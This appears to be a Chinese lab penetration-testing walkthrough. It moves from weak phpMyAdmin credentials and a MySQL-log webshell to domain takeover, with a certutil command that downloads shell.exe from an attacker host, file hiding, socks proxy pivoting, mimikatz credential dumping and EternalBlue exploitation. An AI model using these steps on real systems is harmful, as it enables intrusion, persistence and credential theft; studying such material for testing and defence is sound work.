环境搭建:
最终效果为如此,web服务器可以ping通外网和内网两台服务器
外网打点
信息收集
发现端口:
80 http
3306 mysql
敏感目录:
/phpMyadmin
数据库弱口令 root root
通过日志功能getshell
现在咱们查询一下日志功能是否开启,默认是关闭的。
show variables like "general_log%";
开启日志功能
命令行 set globalgeneral_log='on';
图形化:
修改日志保存路径:
输入一句话木马并执行,使日志保存一句话木马。
拿到shell权限。
稳定权限
certutil -urlcache -split -f http://192.168.x.xxx/shell.exe
将文件设置为隐藏文件
attrib shell.exe +s +h
内网信息探测:
msf的马子让cs去接受。
可以看到cs这里已经成功上线
先提权:
可以看到已经多了一个system用户。
内网渗透
mimikatz工具抓取本机用户名密码:
查看域下其他主机
回到msf
route查看路由表
结合cs获得的内网主机信息可以得到 内网的网段为 192.168.52.0/24
socks代理
加入路由表 (1是session值)route add 192.168.52.0 255.255.255.0 1
输出路由表信息 route print
run autoroute -s 10.10.10.0/24
(加入到路由表是搭建内网转发socks代理的前提之一)
使用代理模块
并设置参数
jobs一下查看到存在 jobs值便说明代理设置成功。
配置etc/proxychains4.conf
Proxychains +命令
成功将kali的流量转发的内网中。
关一下防火墙
我这里直接就关了,如果没有成功可以提一下权到system
探测到内网主机138主机开放445端口
使用msf的永恒之蓝模块
余下的一台内网主机,如法炮制。文章来源:https://www.toymoban.com/news/detail-404453.html
至此整个目标域网络拿下。 文章来源地址https://www.toymoban.com/news/detail-404453.html
到了这里,关于内网渗透测试 MSF搭建socks代理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!